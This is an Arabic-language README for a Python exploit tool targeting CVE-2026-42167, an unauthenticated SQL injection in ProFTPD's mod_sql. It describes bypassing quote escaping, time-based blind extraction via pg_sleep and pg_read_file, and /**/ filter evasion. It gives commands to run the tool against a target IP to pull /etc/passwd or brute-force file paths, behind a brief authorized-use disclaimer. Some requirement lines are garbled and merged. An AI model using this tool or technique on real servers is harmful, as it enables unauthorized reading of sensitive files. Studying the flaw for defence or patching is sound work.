
استغلال بلغة بايثون لثغرة CVE-2026-42167 (ProFTPD mod_sql). يتضمن فحصًا آليًا للملفات واستخراجًا أعمى للبيانات يعتمد على التوقيت.
أداة بحث أمني احترافية لاستغلال ثغرة CVE-2026-42167 في وحدة mod_sql الخاصة بـ ProFTPD. تقوم هذه الأداة بتنفيذ حقن SQL غير مصادق عليه لاستخراج ملفات حساسة من الخادم عبر هجمات القنوات الجانبية القائمة على الوقت.
"ملاحظة: تعتمد كفاءة هذه الأداة على صلاحيات مستخدم PostgreSQL واستقرار الشبكة."
CVE-2026-42167 هو خلل منطقي حرج في دالة is_escaped_text() الخاصة بـ ProFTPD. عندما يتم تكوين mod_sql لتسجيل أوامر USER، يمكن للمهاجم تجاوز تهريب SQL من خلال تقديم مدخلات تبدأ وتنتهي بعلامة اقتباس مفردة ('). تستغل هذه الأداة هذا التجاوز لتنفيذ أوامر خاصة بـ PostgreSQL.
USER مفعّلاً.pg_sleep() و pg_read_file() لاستغلال موثوق./**/) لتجاوز آليات تصفية المسافات.git clone https://github.com/efeanilarslan/CVE-2026-42167-Exploit
cd CVE-2026-42167-Exploit
pip install -r requirements.txt # (لا توجد تبعيات خارجية مطلوبة)
python3 proftpd_master_exploit.py -t <TARGET_IP> -p 2121
python3 proftpd_master_exploit.py -t <TARGET_IP> -f /etc/passwd
python3 proftpd_master_exploit.py -t <TARGET_IP> -w common.txt -s 1.5
| العلم | الوصف | الافتراضي |
|---|---|---|
-t | عنوان IP للهدف | مطلوب |
-p | منفذ FTP للهدف | 2121 |
-s | مدة النوم لهجوم التوقيت | 2.0 ثانية |
-w | قائمة كلمات لاكتشاف الملفات | لا شيء |
-f | مسار ملف محدد للاستخراج | لا شيء |
هذه الأداة مخصصة للأغراض التعليمية والاختبارات الأمنية المصرح بها فقط. المطور غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. استخدمها بمسؤولية.